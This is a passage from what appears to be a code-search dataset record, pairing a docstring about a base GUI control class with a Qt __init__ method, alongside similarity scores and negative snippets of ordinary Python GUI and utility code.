getModes(this):\n\t\tthis.checkInit()\n\t\t\n\t\t# On sauvegarde la config actuelle\n\t\tinit = this.config(get=True)\n\t\t\n\t\t# Ensembles de modes\n\t\tformats = Camera.formats.copy()\n\t\tmodes = set()\n\t\t\n\t\t# On averti du départ\n\t\tprint '\\nLooping modes for the camera... (%d modes)' % (len(formats))\n\t\t\t\n\t\t# Pour chaques formats\n\t\twhile formats:\n\t\t\t\n\t\t\t# On récupère le format à tester\n\t\t\tformat = formats.pop()\n\t\t\t\n\t\t\t# Configuration actuelle\n\t\t\tmode = this.config(\n\t\t\t\theight = float(format[1]),\n\t\t\t\twidth = float(format[0])\n\t\t\t)\n\t\t\t\n\t\t\t# On enregistre le mode\n\t\t\tcurrentFormat = (mode['width'], mode['height'])\n\t\t\tmodes.add(currentFormat)\n\t\t\tif currentFormat in formats:\n\t\t\t\tformats.remove(currentFormat)\n\t\t\t\n\t\t\t# On affiche l'itération courante\n\t\t\tprintf('%d%5s\\r' % (len(formats), ''))\n\t\t###\n\t\t\n\t\t# On remet comme avant et on retourne la liste de modes\n\t\tthis.config(params=init); print 'Done, found %d.' % (len(modes))\n\t\treturn [(int(mode[0]), int(mode[1])) for mode in modes]", "def build_exception_map(cls, tokens):\r\n exception_ranges = defaultdict(list)\r\n for token in tokens:\r\n token_type, _, token_start, token_end = token[0:4]\r\n if token_type in (tokenize.COMMENT, tokenize.STRING):\r\n if token_start[0] == token_end[0]:\r\n exception_ranges[token_start[0]].append((token_start[1], token_end[1]))\r\n else:\r\n exception_ranges[token_start[0]].append((token_start[1], sys.maxint))\r\n for line in range(token_start[0] + 1, token_end[0]):\r\n exception_ranges[line].append((0, sys.maxint))\r\n exception_ranges[token_end[0]].append((0, token_end[1]))\r\n return exception_ranges", "def preset_modes(self) -> list[str]:\n # Use the Vallox profile names for the preset names.\n return list(STR_TO_VALLOX_PROFILE_SETTABLE.keys())", "def parse_layout(keymap_c: str):\n lines = get_keymap(keymap_c)\n lines = remove_excess_white_space(lines)\n layout_strs = get_layouts_strs(lines)\n return get_layout_keys(layout_strs)", "def _get_modes(self, L=0):\n l = np.arange(L + 1).reshape((-1, 1))\n z = np.zeros((L + 1, 2))\n return np.hstack([l, z])", "def get_mode(self):\n self.read(\":FUNC?\")", "def get_config_lines(self, key):\n return \" \".join([key, self._config[key][\"value\"], \"#\", self._config[key][\"comments\"]] if self._config[key][\"comments\"] is not None\n else [key, self._config[key][\"value\"]])", "def init_modes(self):\n \n self.deleteMode = delete_Mode()\n self.commandMode = command_Mode()\n self.visualMode = visual_Mode()\n self.insertMode = insert_Mode()\n self.exMode = ex_Mode()\n self.yankMode = yank_Mode()\n self.gmodeMode = gmode_Mode()\n self.cmodeMode = cmode_Mode()\n self.rmodeMode = rmode_Mode()\n self.tmodeMode = tmode_Mode()\n self.selectionMode = selection_Mode()\n self.indentMode = indent_Mode()", "def modes(self, avg=False):\n if not self.fp_init:\n self._init_full_props\n if avg:\n return self._modes_avg, self._num_modes\n return self._modes, self._num_modes", "def get_opcode_mode(op):\n op_str = f\"{op:05}\"\n DE = int(op_str[-2:])\n C = int(op_str[2])\n B = int(op_str[1]) \n A = int(op_str[0]) \n\n return A, B, C, DE", "def currentMode(self):\n logger.debug(\"Func: currentMode/getter\")\n\n return self._currentsDict[\"currentMode\"]", "def separate_mode_type(mode):\n m = stat.S_IMODE(mode)\n t = stat.S_IFMT(mode)\n return m, mode_to_unix(t)", "def ActiveHlt2Lines(self) :\n\n lines = [\n 'Hlt2SingleMuon',\n 'Hlt2SingleMuonHighPT',\n 'Hlt2SingleMuonLowPT',\n ]\n \n return lines", "def extra_state_attributes(self) -> dict[str, str]:\n if self._cmode is None:\n return {}\n return {ATTR_CMODE: self._cmode}", "def _get_lsp_config_path_select_mode_unconditional(self):\n return self.__lsp_config_path_select_mode_unconditional", "def get_map(self):\n return self.get_raw_ys()", "def branches(self):\n return self.in_lines + self.out_lines" ]
[ "0.63044417", "0.6147848", "0.5959693", "0.5748074", "0.57146144", "0.5593236", "0.54169565", "0.54102844", "0.53679585", "0.5359293", "0.5346539", "0.5331634", "0.53012353", "0.5280056", "0.52593654", "0.52485204", "0.51640564", "0.5128611", "0.51207393", "0.51181734", "0.5070815", "0.50445783", "0.50445783", "0.5026303", "0.5024813", "0.5011286", "0.4998007", "0.4982108", "0.49743688", "0.49624553", "0.4946604", "0.49225214", "0.49156147", "0.49013764", "0.48998696", "0.48776537", "0.4872287", "0.48685196", "0.48679757", "0.48463494", "0.4843349", "0.48277453", "0.48260796", "0.4804955", "0.48033822", "0.48012325", "0.4771022", "0.47652483", "0.47610146", "0.4739435", "0.47350392", "0.47309792", "0.47213328", "0.47153068", "0.47123528", "0.47106335", "0.47102326", "0.4706636", "0.47035414", "0.47001228", "0.46847597", "0.46842253", "0.46753025", "0.46725753", "0.46582302", "0.46556345", "0.46523872", "0.46483147", "0.4645053", "0.46333164", "0.4632547", "0.4622022", "0.46153834", "0.45971", "0.45969278", "0.4593864", "0.45911032", "0.45879862", "0.45861897", "0.45856938", "0.4584695", "0.45794022", "0.45739627", "0.45658514", "0.45586914", "0.4558479", "0.45564532", "0.4555265", "0.45515016", "0.4550603", "0.4547667", "0.45463377", "0.45452863", "0.4544144", "0.4543211", "0.45391715", "0.4531764", "0.45269614", "0.4526361", "0.45251802" ]
0.808408
0
Base Class for all controls. On its own, this is just a Label in a BoxLayout.
def __init__(self, label:str=None, variable_name:str=None, value:typing.Any=None, parent:QtWidgets.QWidget=None, on_change:typing.Callable=None): QtWidgets.QWidget.__init__(self, parent=parent) if label is None: if variable_name is None: label = "" else: label = app.translator(variable_name) self._make_label_widget(label) self.layout = self._formset() self.setLayout(self.layout) self.label = label ValueMixin.__init__(self, variable_name=variable_name, on_change=on_change, value=value)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def create_label(self):\n\n self.pc_label = Label(self.form_box, text=\"Primary Current [A]:\", anchor='nw', width=32,\n bg=self.design.color.secondary, font=('Arial', 15))\n self.sc_label = Label(self.form_box, text=\"Secondary Current [A]:\", anchor='nw', width=32,\n bg=self.design.color.secondary, font=('Arial', 15))\n self.avg_t_label = Label(self.form_box, text=\"Average Time [s]: \", anchor='nw', width=32,\n bg=self.design.color.secondary, font=('Arial', 15))\n self.nwt_label = Label(self.form_box, text=\"network type (static/dynamic):\", anchor='nw', width=32,\n bg=self.design.color.secondary, font=('Arial', 15))\n self.nw_ip_label = Label(self.form_box, text=\"IpAddress:\", anchor='nw', width=32,\n bg=self.design.color.secondary, font=('Arial', 15))\n self.nw_gw_label = Label(self.form_box, text=\"Gateway:\", anchor='nw', width=32, bg=self.design.color.secondary,\n font=('Arial', 15))\n self.nw_sm_label = Label(self.form_box, text=\"subnet mask:\", anchor='nw', width=32,\n bg=self.design.color.secondary, font=('Arial', 15))\n self.nw_mca_label = Label(self.form_box, text=\"Mac Address:\", anchor='nw', width=32,\n bg=self.design.color.secondary, font=('Arial', 15))", "def create_widget(self):\n self.widget = UILabel()", "def GridLabel(Parent,Text,Row,Column):\r\n L = Label(Parent,text=Text)\r\n L.grid(row=Row,column=Column)\r\n return L", "def BaseLabel(self, *args):\n return _XCAFDoc.XCAFDoc_ShapeTool_BaseLabel(self, *args)", "def add_label(self, side=\"left\", **kwargs):\n widget = ttk.Label(self, **kwargs)\n widget.pack(side=side)\n\n return widget", "def label(self, color):\r\n return Label(self, color)", "def __init__(self, parent, text):\n tk.Frame.__init__(self, parent)\n\n label = tk.Label(self, text=\"De Centrale\", font=(\"Verdana\", 25))\n label.pack(fill=tk.BOTH, side='left', anchor='w')\n\n label = tk.Label(self, text=text, anchor=\"e\", font=(\"Verdana\", 12))\n label.pack(expand=True, fill=tk.BOTH, side='right', anchor='e')", "def create_label(self, on, text: str):\n return tk.Label(on, font=self.FONT, bg=self.BG_COLOR, text=text)", "def __init__(self, parent, text_link=None):\n Frame.__init__(self, parent)\n if text_link is None:\n text_link = StringVar(value=\"Running\")\n self._text = text_link\n self._label = Label(self, bd=1, relief=SUNKEN, anchor=W, textvariable=self._text)\n self._label.pack(fill=X)", "def __init__(self, label=None):\n super().__init__(\"h\", 1, [], label=label)", "def customWidgets(self):\n \n # to be called a property value needs to change\n def onValueChanged(widget, prop):\n # set the corresponding property of the videobalance element\n self.balance.set_property(prop, widget.get_value())\n\n # videobalance has several properties, with the following range\n # and defaults\n properties = [(\"contrast\", 0, 2, 1),\n (\"brightness\", -1, 1, 0), \n (\"hue\", -1, 1, 0),\n (\"saturation\", 0, 2, 1)]\n \n # create a place to hold our controls\n controls = gtk.VBox()\n labels = gtk.VBox()\n # for every propety, create a control and set its attributes\n for prop, lower, upper, default in properties:\n widget = gtk.HScale(); label = gtk.Label(prop)\n\n # set appropriate atributes\n widget.set_update_policy(gtk.UPDATE_CONTINUOUS)\n widget.set_value(default)\n widget.set_draw_value(True)\n widget.set_range(lower, upper)\n\n # connect to our signal handler, specifying the property\n # to adjust\n widget.connect(\"value-changed\", onValueChanged, prop)\n \n # pack widget into box\n controls.pack_start(widget, True, True)\n labels.pack_start(label, True, False)\n\n layout = gtk.HBox()\n layout.pack_start(labels, False, False)\n layout.pack_end(controls, True, True)\n return layout", "def BaseLabel(self, *args):\n return _XCAFDoc.XCAFDoc_ColorTool_BaseLabel(self, *args)", "def __init__(self,name,value,*args,**kargs):\n self._plain = kargs.get('plain',False)\n self.input = QtGui.QLabel()\n maxw,maxh = maxSize()\n self.input.setMaximumSize(int(0.75*maxw),maxh)\n InputItem.__init__(self,name,*args,**kargs)\n self.setValue(value)\n self.layout().insertWidget(1,self.input)\n self.label.setWordWrap(True)\n self.setSize()", "def __init__(self, text=\"\", widget=None):\n self._label_text = text\n self._widget = widget\n self._widget.on_change = self._update\n super().__init__(text=f\"{text} {widget.value}\")", "def BaseLabel(self, *args):\n return _XCAFDoc.XCAFDoc_LayerTool_BaseLabel(self, *args)", "def __init__(self, font, color, text=\"\", top=0, left=0, bottom=None, right=None):\n self.text = text\n self.font = font\n self.color = color\n self.top = top\n self.left = left\n self.bottom = bottom\n self.right = right\n self.renderLabel()", "def Label(self) -> str:", "def DrawControlLabel(self, dc, wnd, item, rect):\r\n\r\n label_size = GetLabelSize(dc, item.GetLabel(), item.GetOrientation() != AUI_TBTOOL_HORIZONTAL)\r\n text_height = label_size.GetHeight()\r\n text_width = label_size.GetWidth()\r\n\r\n dc.SetFont(self._font)\r\n\r\n if self._agwFlags & AUI_TB_TEXT:\r\n \r\n tx, text_height = dc.GetTextExtent(\"ABCDHgj\") \r\n\r\n text_width, ty = dc.GetTextExtent(item.GetLabel())\r\n\r\n # don't draw the label if it is wider than the item width\r\n if text_width > rect.width:\r\n return\r\n\r\n # set the label's text colour\r\n dc.SetTextForeground(wx.BLACK)\r\n\r\n text_x = rect.x + (rect.width/2) - (text_width/2) + 1\r\n text_y = rect.y + rect.height - text_height - 1\r\n\r\n if self._agwFlags & AUI_TB_TEXT and item.GetLabel() != \"\": \r\n dc.DrawText(item.GetLabel(), text_x, text_y)", "def label_grid(self):\n\n self.pc_label.grid(row=0, sticky=\"nw\", pady=2, padx=3)\n self.sc_label.grid(row=1, sticky=\"nw\", pady=2, padx=3)\n self.avg_t_label.grid(row=2, sticky=\"nw\", pady=2, padx=3)\n self.nwt_label.grid(row=4, sticky=\"nw\", pady=2, padx=3)\n self.nw_ip_label.grid(row=5, sticky=\"nw\", pady=2, padx=3)\n self.nw_gw_label.grid(row=6, sticky=\"nw\", pady=2, padx=3)\n self.nw_sm_label.grid(row=7, sticky=\"nw\", pady=2, padx=3)\n self.nw_mca_label.grid(row=8, sticky=\"nw\", pady=2, padx=3)", "def BaseLabel(self, *args):\n return _XCAFDoc.XCAFDoc_MaterialTool_BaseLabel(self, *args)", "def createLabel(self, text, font):\n label = QLabel(self)\n label.setFont(font)\n label.setText(text)\n label.setFixedHeight(40)\n label.setAlignment(Qt.AlignCenter)\n label.setStyleSheet('background-color: rgba(0,0,0,0);color: white; border: 0px solid black; ')\n return label", "def __init__(self, parent) -> None:\n super().__init__(parent)\n\n self.setText(\"\")\n self.setPixmap(QPixmap(self.image))\n\n self.setScaledContents(False)\n self.setObjectName(\"Label_Bild\")\n self.setAlignment(QtCore.Qt.AlignCenter)", "def __init__(self, label):\n self.label = label", "def __init__(self,\n rect: Rect,\n text: str = \"\",\n style: Style = None,\n parent: Component = None) -> None:\n Component.__init__(self, rect, style=style, parent=parent)\n self.set_text(text)", "def __init__(self, parent, *args, **kwargs):\n tk.LabelFrame.__init__(self, parent, *args, **kwargs)\n self.canvas = MainCanvas(self, bg=\"orange\")\n self.canvas.pack(side='top', fill='both', expand=True)", "def create_widgets(self):\n #create description label\n Label(self,\n text = \"Patient Info:\"\n ).grid(row = 0, column = 0, sticky = W)", "def __init__(self, x, y, align_bottom_left, text, font, color):\n super(TextBox, self).__init__(x, y)\n\n self.align_bottom_left = align_bottom_left\n self.__text = text\n self.font = font\n self.color = color\n self.original_x = x\n self.original_y = y\n self.image = None\n self.image_rect = None\n\n self.set_text(text)", "def myEntLabel(name='myText', \r\n\t\t\t numb=None,\r\n\t\t\t call=None, data=['dati'],\r\n\t\t\t nLab='Label', cLab=\"#333\",\r\n\t\t\t tLab='h', aLab=[False, False, 1]):\r\n#myEntry\r\n\t# entr, call\r\n\tentr,call = myEntry(name=name,\r\n\t\t\t \t\t\tnumb=numb, \r\n\t\t\t \t\t\tcall=call, data=data)\r\n#myLabel\r\n\tif cLab == None:\r\n\t\tcLab=Gdk.color_parse('blue')\r\n\t# labe\r\n\tlabe = myLabel(name=nLab, \r\n\t\t\t\t\tleng=len(nLab)+1, prea=' ', post=' ', \r\n\t\t\t\t\tfont='Courier 10', \r\n\t\t\t\t\tcolo=cLab)\r\n#xBox \r\n\txBox = myBox(tLab)\r\n\t#child, expand=True, fill=True, padding=0\r\n\txBox.pack_start(labe, *aLab)\r\n\txBox.pack_start(entr, *aLab)\t\r\n# <- \r\n\treturn xBox, [entr, call, labe]", "def __init__(self, text='', **kwargs):\n Control.__init__(self, text=text, **kwargs)", "def create_controls(self):\n\n self.button_frame = tk.LabelFrame(self, text=\"Controls\", padx=5, pady=5)\n self.button_frame.grid(row=0, column=1, padx=5, pady=5, sticky=\"n\")\n self.load_data = tk.Button(\n self.button_frame, text=\"Load Data\", command=self.update_stats\n )\n self.load_data.grid(row=0)\n\n self.print_data = tk.Button(\n self.button_frame, text=\"Print Data\", command=self.print_raw_data,\n )\n self.print_data.grid(row=1)\n\n self.quit = tk.Button(\n self.button_frame, text=\"Quit\", fg=\"red\", command=self.master.destroy\n )\n self.quit.grid(row=2)", "def create_ui(self):\n main_sizer = wx.BoxSizer(wx.VERTICAL)\n\n self.text_ctrl = wx.TextCtrl(self, style=wx.TE_MULTILINE)\n self.text_ctrl.Bind(wx.EVT_TEXT, self.on_text)\n main_sizer.Add(self.text_ctrl, 1, wx.ALL | wx.EXPAND, 5)\n\n self.SetSizer(main_sizer)", "def BaseLabel(self, *args):\n return _XCAFDoc.XCAFDoc_DimTolTool_BaseLabel(self, *args)", "def __init__( self ):\n \n Frame.__init__( self ) # initializes Frame instance\n \n # frame fills all available space\n self.pack( expand = YES, fill = BOTH )\n self.master.title( \"Labels\" )\n \n self.Label1 = Label( self, text = \"Label with text\" )\n \n # resize frame to accommodate Label\n self.Label1.pack()\n \n self.Label2 = Label( self,\n text = \"Labels with text and a bitmap\" )\n \n # insert Label against left side of frame\n self.Label2.pack( side = LEFT )\n \n # using default bitmap image as label\n self.Label3 = Label( self, bitmap = \"warning\" )\n self.Label3.pack( side = LEFT )", "def __init__(self, dat, frame, box_size, centre,\n label=False, **kwargs):\n\n super().__init__(dat, frame, box_size, centre) # initialise superclass\n\n self.label = label # write labels\n\n self.draw()", "def __init__(self, name, label, class_to_use, size, state, left_window_label=None, left_window_value=None):\n self.name = name\n self.label = label\n self.class_to_use = class_to_use\n self.size = size\n self.state = state\n self.left_window_label = left_window_label\n self.left_window_value = left_window_value", "def __init__(self, ax, labels, bw=None, bh=None, colors=None, actives=None):\n AxesWidget.__init__(self, ax)\n\n labels = copy.deepcopy(labels)\n\n labels.append(\"select all\")\n labels.append(\"unselect all\")\n print(\"colors\", colors)\n colors = colors+[\"#000000\"]*2\n\n ax.set_xticks([])\n ax.set_yticks([])\n ax.set_navigate(False)\n\n if actives is None:\n actives = [False] * len(labels)\n actives = actives+[False]*2\n\n if len(labels) > 1:\n dy = 1. / (len(labels) + 1)\n ys = np.linspace(1 - dy, dy, len(labels))\n else:\n dy = 0.25\n ys = [0.5]\n\n axcolor = ax.get_facecolor()\n\n self.labels = []\n self.lines = []\n self.rectangles = []\n\n lineparams = {'color': 'k', 'linewidth': 1.2,\n 'transform': ax.transAxes, 'solid_capstyle': 'butt'}\n\n for index, (y, label, active) in enumerate(zip(ys, labels, actives)):\n if colors is None:\n t = ax.text(0.25, y, label, transform=ax.transAxes,\n horizontalalignment='left',\n verticalalignment='center')\n else:\n t = ax.text(0.25, y, label, transform=ax.transAxes,\n horizontalalignment='left',\n verticalalignment='center', color=colors[index])\n\n if bw is None:\n w = dy / 2\n else:\n w = bw\n\n if bh is None:\n h = dy / 2\n else:\n h = bh\n\n x, y = 0.05, y - h / 2\n\n p = Rectangle(xy=(x, y), width=w, height=h, edgecolor='black',\n facecolor=axcolor, transform=ax.transAxes)\n\n l1 = Line2D([x, x + w], [y + h, y], **lineparams)\n l2 = Line2D([x, x + w], [y, y + h], **lineparams)\n\n l1.set_visible(active)\n l2.set_visible(active)\n self.labels.append(t)\n self.rectangles.append(p)\n self.lines.append((l1, l2))\n ax.add_patch(p)\n ax.add_line(l1)\n ax.add_line(l2)\n\n self.connect_event('button_press_event', self._clicked)\n\n self.cnt = 0\n self.observers = {}", "def label(self):\r\n raise NotImplementedError", "def __display_controls(self):\n self.__fill_data_variables()\n self.__fill_smoothing_method()\n self.__fill_smooth_factor()\n\n left_box = VBox([self.data_vars])\n center_box = VBox([self.smoothing_methods])\n right_box = VBox([self.smooth_factor])\n #_HBox = HBox([left_box, center_box, right_box],\n _HBox = HBox([left_box, center_box, right_box],\n layout={'height': '80px',\n 'width' : '99%'}\n )\n display(_HBox)", "def add_variable(self, side=\"left\", **kwargs):\n widget = ttk.Label(self, **kwargs)\n widget.pack(side=side)\n\n return widget", "def __init__(self):\n\t\tself.root = Tk()\n\t\tself.root.geometry(\"1600x1600\")\n\t\ttitle_arabic=u'\\uFEB3\\uFEE8\\uFECC\\uFEEE\\uFEA9'\n\t\tself.root.title(title_arabic)\n\t\tself.root.geometry(\"1600x900\")\t\t\n\t\tself.root.resizable(width=False, height=False)\n\t\tmylabel=Label(text=\"Loading . . .\",fg=\"#ff1a75\",bg=\"black\",font=(\"Times New Roman\",18))\n\t\tmylabel.place(x=665,y=300)\n\t\tmylabel3=Text()\n\t\tmylabel3.place(x=550,y=395)\n\t\tmylabel3['width']='50'\n\t\tmylabel3['height']=0.6\n\t\tmylabel3.configure(state='disabled')\n\t\tself.root.configure(background='black')\n\t\tself.load()\n\t\tself.root.mainloop()", "def init ( self, parent ):\n # Create a panel to hold all of the buttons:\n self.control = panel = wx.Panel( parent, -1 )\n sizer = wx.BoxSizer( wx.VERTICAL )\n \n # Add the standard font control:\n font = self._font = wx.TextCtrl( panel, -1, self.str_value )\n wx.EVT_KILL_FOCUS( font, self.update_object )\n wx.EVT_TEXT_ENTER( panel, font.GetId(), self.update_object )\n sizer.Add( font, 0, wx.EXPAND | wx.BOTTOM, 3 )\n \n # Add all of the font choice controls:\n sizer2 = wx.BoxSizer( wx.HORIZONTAL )\n facenames = all_facenames()\n control = self._facename = wx.Choice( panel, -1, wx.Point( 0, 0 ), \n wx.Size( choice_width( facenames ), 20 ), \n facenames )\n \n sizer2.Add( control, 2, wx.EXPAND )\n wx.EVT_CHOICE( panel, control.GetId(), self.update_object_parts )\n \n control = self._point_size = wx.Choice( panel, -1, \n wx.Point( 0, 0 ), wx.Size( 30, 20 ), \n PointSizes )\n sizer2.Add( control, 1, wx.EXPAND | wx.RIGHT, 3 )\n wx.EVT_CHOICE( panel, control.GetId(), self.update_object_parts ) \n \n sizer.Add( sizer2, 0, wx.EXPAND )\n \n # Set-up the layout:\n panel.SetAutoLayout( True )\n panel.SetSizer( sizer )\n sizer.Fit( panel )", "def create_widget(self):\n pass", "def create_labels(self):\n for name in self.names:\n temp_button = Label(text=name)\n self.root.ids.label_box.add_widget(temp_button)", "def initWidgets(self):\n self.loctext.setText(\"{0:g}\".format(self.loc))\n self.scaletext.setText(\"{0:g}\".format(self.scale))", "def __init__(self, title=None, dimensions=None, style=None, spacing=None, margin=None, layout=None):\n super(customGroupBox, self).__init__()\n\n if layout:\n self.setLayout(layout)\n else:\n self.setLayout(QtGui.QVBoxLayout())\n\n if title:\n self.setTitle(title)\n\n if dimensions:\n self.setFixedSize(dimensions[0], dimensions[1])\n\n if style:\n self.setStyle(QtGui.QStyleFactory.create(style))\n\n if margin:\n self.layout().setContentsMargins(margin, margin, margin, margin)\n\n if spacing:\n self.layout().setSpacing(spacing)", "def __init__(self, parent=None):\n QLabel.__init__(self, parent)\n self.start_animation(self.SLOW_DURATION)", "def text(self) -> None:\n label_space = tk.Label(self)\n label_space.grid(row=0)\n label_book_number = tk.Label(self, text=f'Номер книги:')\n label_book_number.grid(row=1, column=0, ipady=5)\n label_title = tk.Label(self, text='Название книги:')\n label_title.grid(row=2, column=0, padx=5)\n label_author = tk.Label(self, text='Автор:')\n label_author.grid(row=3, column=0, pady=5)\n label_genre = tk.Label(self, text='Жанр:')\n label_genre.grid(row=4, column=0)", "def toControls(self,widget):", "def renderLabel(self):\n self.render = self.font.render(self.text, True, self.color)\n self.rect = self.render.get_rect()", "def _initLayout(self):\n\t\tpanel = wx.Panel(self)\n\n\t\t# Create a font object\n\t\tfont = wx.SystemSettings.GetFont(wx.SYS_SYSTEM_FONT)\n\t\tfont.SetPointSize(9)\n\n\t\t# Vertical sizer will contain multiple horizontal sizers as rows\n\t\tvbox = wx.BoxSizer(wx.VERTICAL)\n\n\t\t# First Row: The text we need to categorize\n\t\thbox1 = wx.BoxSizer(wx.HORIZONTAL)\n\t\tst1 = wx.StaticText(panel, label='Text')\n\t\tst1.SetFont(font)\n\t\thbox1.Add(st1, flag=wx.RIGHT, border=8)\n\t\ttc = wx.TextCtrl(panel)\n\t\tself._textControl = tc\n\t\thbox1.Add(tc, proportion=1)\n\t\tvbox.Add(hbox1, flag=wx.EXPAND|wx.LEFT|wx.RIGHT|wx.TOP, border=10)\n\t\t\n\t\t# The existing class assignment\n\t\thboxExisting = wx.BoxSizer(wx.HORIZONTAL)\n\t\tlabel = wx.StaticText(panel, label='Current')\n\t\tlabel.SetFont(font)\n\t\thboxExisting.Add(label, flag=wx.RIGHT, border=8)\n\t\t\n\t\tlabel = wx.StaticText(panel, label=\"(unassigned)\")\n\t\tself._existingClass = \"(unassigned)\"\n\t\tself._existingClassLabel = label\n\t\tlabel.SetFont(font)\n\t\thboxExisting.Add(label, flag=wx.RIGHT, border=8)\n\t\tvbox.Add(hboxExisting, flag=wx.EXPAND|wx.LEFT|wx.RIGHT|wx.TOP, border=10)\n\t\t\n\t\t# Button to keep the current class assignment\n\t\tbutton = wx.Button(panel, label=\"KEEP\", name=\"*KEEP\")\n\t\thboxExisting.Add(button, flag=wx.RIGHT)\n\n\t\t# Button to skip this record, i.e., move to next record without writing this one out\n\t\tbutton = wx.Button(panel, label=\"DELETE\", name=\"*KILL\")\n\t\thboxExisting.Add(button, flag=wx.RIGHT)\n\n\t\tvbox.Add((-1, 10))\n\n\t\t# Buttons for classes that can be assigned to the text\n\t\thbox2 = wx.BoxSizer(wx.HORIZONTAL)\n\t\tst2 = wx.StaticText(panel, label='Reassign to...')\n\t\tst2.SetFont(font)\n\t\thbox2.Add(st2)\n\t\tvbox.Add(hbox2, flag=wx.LEFT | wx.TOP, border=10)\n\n\t\tvbox.Add((-1, 10))\n\n\t\t# Grid of buttons, one for each class label\n\t\thbox3 = wx.GridSizer(8,5,50)\n\t\n\t\tfor label in sorted(labels.LABELS):\n\t\t\tbutton = MyButton(panel, label=label, size=(70, 30), name=label)\n\t\t\thbox3.Add(button)\n\n\t\tvbox.Add(hbox3, flag=wx.LEFT|wx.RIGHT|wx.EXPAND, \n\t\t\tborder=10)\n\t\t\n\t\tpanel.SetSizer(vbox)", "def __init__(self):\n super(GraphVisualizerCase, self).__init__()\n\n self._v_layout = QVBoxLayout()\n self.setLayout(self._v_layout)\n\n top_label_layout = QHBoxLayout()\n self._v_layout.addLayout(top_label_layout)\n\n self._top_left_label = MathTextLabel()\n top_label_layout.addWidget(self._top_left_label)\n self._top_right_label = MathTextLabel()\n top_label_layout.addWidget(self._top_right_label)\n\n self._center_widget = QFrame()\n self._center_text_label = QLabel()\n self._center_text_label.setAlignment(Qt.AlignCenter)\n layout = QHBoxLayout()\n layout.addWidget(self._center_text_label)\n self._center_widget.setLayout(layout)\n\n self._v_layout.addWidget(self._center_widget)\n\n bot_label_layout = QHBoxLayout()\n self._v_layout.addLayout(bot_label_layout)\n\n self._bot_left_label = MathTextLabel()\n bot_label_layout.addWidget(self._bot_left_label)\n self._bot_right_label = MathTextLabel()\n bot_label_layout.addWidget(self._bot_right_label)", "def _create_label(self, x, y, text, width=50, **config):\n\n self.main_canvas.create_text(x, y, text='%6s' % text, width=width, **config)", "def _setup_ui(self):\n from functools import partial\n\n self.setStyleSheet(\n \"\"\"\n QLabel[labelField=\"true\"] {\n font-weight: bold;\n }\n \"\"\"\n )\n\n # The main layout\n self.main_layout = QtWidgets.QVBoxLayout(self)\n self.main_layout.setContentsMargins(0, 0, 0, 0)\n\n # the form layout\n self.form_layout = QtWidgets.QFormLayout()\n self.form_layout.setLabelAlignment(\n QtCore.Qt.AlignRight | QtCore.Qt.AlignTrailing | QtCore.Qt.AlignVCenter\n )\n\n # store roles\n label_role = QtWidgets.QFormLayout.LabelRole\n field_role = QtWidgets.QFormLayout.FieldRole\n\n self.main_layout.addLayout(self.form_layout)\n\n i = -1\n\n # Reviewer\n i += 1\n reviewer_name_label = QtWidgets.QLabel(self)\n reviewer_name_label.setText(\"Reviewer\")\n self.form_layout.setWidget(i, label_role, reviewer_name_label)\n\n self.reviewer_name_widget = QtWidgets.QLabel(self)\n self.form_layout.setWidget(i, field_role, self.reviewer_name_widget)\n\n # Task Name field\n i += 1\n task_name_label = QtWidgets.QLabel(self)\n task_name_label.setText(\"Task\")\n self.form_layout.setWidget(i, label_role, task_name_label)\n\n self.task_name_widget = QtWidgets.QLabel(self)\n self.form_layout.setWidget(i, field_role, self.task_name_widget)\n\n # # Version Info field\n # from anima.ui.widgets.version import VersionDetailsWidget\n # self.latest_version_widget = VersionDetailsWidget(parent=self)\n # self.main_layout.insertWidget(0, self.latest_version_widget)\n\n # Review Type Field\n i += 1\n review_type_label = QtWidgets.QLabel(self)\n review_type_label.setText(\"Review Type\")\n self.form_layout.setWidget(i, label_role, review_type_label)\n\n self.review_type_widget = ReviewTypeWidget(self)\n self.review_type_widget.currentIndexChanged.connect(\n partial(self.review_type_changed_callback)\n )\n\n self.form_layout.setWidget(i, field_role, self.review_type_widget)\n\n # Timing Field\n i += 1\n effort_label = QtWidgets.QLabel(self)\n effort_label.setText(\"Timing\")\n self.form_layout.setWidget(i, label_role, effort_label)\n\n effort_layout = QtWidgets.QHBoxLayout()\n self.form_layout.setLayout(i, field_role, effort_layout)\n\n from anima.ui.widgets.timing import ScheduleTimingWidget\n from anima import defaults\n\n self.timing_widget = ScheduleTimingWidget(\n self, timing_resolution=defaults.timing_resolution\n )\n self.timing_widget.setEnabled(False)\n # set the default to 1 hour\n self.timing_widget.set_schedule_info(timing=1, unit=\"h\")\n effort_layout.addWidget(self.timing_widget)\n\n # Description Field\n i += 1\n description_label = QtWidgets.QLabel(self)\n description_label.setText(\"Description\")\n self.form_layout.setWidget(i, label_role, description_label)\n\n self.description_widget = QtWidgets.QTextEdit(self)\n self.form_layout.setWidget(i, field_role, self.description_widget)", "def create_widgets(self):", "def set_ui(self):\r\n\r\n self.canvas = tk.Canvas(self)\r\n self.canvas.pack()\r\n\r\n self.entry = ttk.Entry(self.canvas, justify=\"center\", font=(\"Calibri\", 12))\r\n\r\n self.grid = Grid(self.canvas)", "def __init__(self, text, separator_line_thickness, label_type, dpi=(600, 600)):\n \n def get_text_on_label(text, label_type):\n \"\"\"Format how the text will look on the label.\n \n text - Text to be placed on the label.\n label_type - One of the types specifying the label layout.\n \"\"\"\n text_on_label = \"\".join([c for c in text if c in string.ascii_letters + string.digits])\n if label_type == 0:\n text_on_label = \"\"\n elif label_type == 1 or label_type == 2 or label_type == 4:\n text_on_label = \"\\n\".join([text_on_label[:4],\n text_on_label[4:8],\n text_on_label[8:12],\n text_on_label[12:]])\n elif label_type == 3:\n text_on_label = \"\\n\".join([\"-\".join([text_on_label[:4],\n text_on_label[4:8]]),\n \"-\".join([text_on_label[8:12],\n text_on_label[12:]])])\n else:\n text_on_label = \"\"\n return text_on_label\n \n self.label_image = None\n self.text_on_label = get_text_on_label(text, label_type)\n self.label_type = label_type\n self.separator_line_thickness = separator_line_thickness\n self.dpi = dpi", "def __init__(\r\n self, text=\"Ok\", font=None, size=30, state: int = Button.INACTIVE\r\n ) -> None:\r\n super().__init__(state)\r\n self._font = Font(font, size)\r\n self._text = text\r\n self.rect = Rect(0, 0, 0, 0)\r\n self.redraw()", "def InitUI(self, frame):\n\t\timport wx\n\t\tframe.SetSize((200,210))\n\t\t\n\t\tpanel = wx.Panel(frame)\n\t\t\n\t\tvbox = wx.BoxSizer(wx.VERTICAL)\n\t\t\n\t\thbox1 = 